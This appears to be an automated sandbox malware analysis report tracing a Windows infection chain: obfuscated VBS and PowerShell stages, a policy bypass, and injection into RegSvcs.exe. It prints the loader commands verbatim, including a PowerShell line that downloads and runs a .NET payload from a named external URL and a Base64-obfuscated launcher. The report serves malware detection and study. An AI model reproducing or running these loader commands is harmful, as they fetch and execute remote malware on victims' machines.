                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6424Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6224Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6728Thread sleep count: 290 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6812Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6772Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,27_2_00409253
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,27_2_0041C291
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,27_2_0040C34D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,27_2_00409665
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,27_2_0040880C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040783C FindFirstFileW,FindNextFileW,27_2_0040783C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,27_2_00419AF5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,27_2_0040BB30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,27_2_0040BD37
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,27_2_00407C97
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                        Source: powershell.exe, 00000015.00000002.3224877117.0000023A52FB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
                        Source: wscript.exe, 0000000F.00000002.1944222598.000001DBF80EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: wscript.exe, 00000012.00000003.1953306728.000002216E9C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\S
                        Source: RegSvcs.exe, 00000008.00000002.3324391807.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: powershell.exe, 00000024.00000002.2184970580.000001B993CA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                        Source: powershell.exe, 00000003.00000002.2969820303.0000029B32BC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
                        Source: powershell.exe, 00000024.00000002.3260194721.000001B9ABDAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_004349F9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,27_2_0041CB50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_004432B5 mov eax, dword ptr fs:[00000030h]27_2_004432B5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00412077 GetProcessHeap,HeapFree,27_2_00412077
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_004349F9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00434B47 SetUnhandledExceptionFilter,27_2_00434B47
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0043BB22
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00434FDC

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: amsi64_6916.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_7924.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_7728.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
                        .NET source code references suspicious native API functions
                        Source: 3.2.powershell.exe.29b32a30000.5.raw.unpack, MXuuJb.csReference to suspicious API methods: ReadProcessMemory_API(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesWritten)
                        Source: 3.2.powershell.exe.29b32a30000.5.raw.unpack, MXuuJb.csReference to suspicious API methods: VirtualAllocEx_API(processInformation.ProcessHandle, num4, length, 12288, 64)
                        Source: 3.2.powershell.exe.29b32a30000.5.raw.unpack, MXuuJb.csReference to suspicious API methods: WriteProcessMemory_API(processInformation.ProcessHandle, num5, data, bufferSize, ref bytesWritten)
                        Bypasses PowerShell execution policy
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Injects a PE file into a foreign processes
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                        Writes to foreign memory regions
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 459000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 471000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 477000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 478000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 479000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 47E000Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: ED4008Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 459000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 471000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 477000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 478000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 479000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 47E000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 703008
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 459000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 471000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 477000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 478000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 479000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 47E000
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 240008
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe27_2_004120F7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00419627 mouse_event,27_2_00419627
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy 